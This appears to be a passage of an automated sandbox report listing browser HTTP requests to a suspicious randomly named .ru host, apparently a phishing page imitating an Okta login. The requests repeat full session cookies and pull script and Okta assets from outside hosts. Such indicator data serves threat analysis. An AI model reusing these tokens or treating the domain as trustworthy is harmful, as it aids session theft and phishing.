XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /wxMUQbNAaXATujlKA9QopbHH7P1A1BqIlSfnrZ12129 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250324%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250324T203425Z&X-Amz-Expires=300&X-Amz-Signature=d04635f17e58ffa61cf46e7fdfd4bcca196e12712bc474c99ae2869d45fd2cd1&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://iy8se.zvptaird.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /qrTJ6QTdDVljK18vstNu7q6r7efiTXfIl0qyGiNa8NrQZ45139 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /mn2PuvbhIFcMJrttWipG93EtklXAmgmrzSR0nYg2b6RtpooVn90146 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /wxMUQbNAaXATujlKA9QopbHH7P1A1BqIlSfnrZ12129 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /mnEHvdn1lma3Z8sOdlltAtMcHGRU9cMcDgEVOl56x6FVZXhsfhriLH22Suv220 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /klUFkUijZI8I4maIlmmk2KISbvzpmlMHBwASJqop1GyoWwyBN3QjMZ1joZJYwTUQKUEewGU3tab221 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /mn2PuvbhIFcMJrttWipG93EtklXAmgmrzSR0nYg2b6RtpooVn90146 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijrrObu1nfXwffheWoHLNm0u1yLcdoW0RNiuM3Bdn5q7QXcd78164 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /wxv83bmfFs993ZebAr6zux5SnJKV0rVR7L7ElmnyAXnB9Hd7rV1iW6Juab179 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /qrTJ6QTdDVljK18vstNu7q6r7efiTXfIl0qyGiNa8NrQZ45139 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /rsryoNCzrUl1bJ4h00jRRztjIlnqEseCh1qwZ9uvTMdxXKJkfUJqmtCcd192 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijrrObu1nfXwffheWoHLNm0u1yLcdoW0RNiuM3Bdn5q7QXcd78164 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
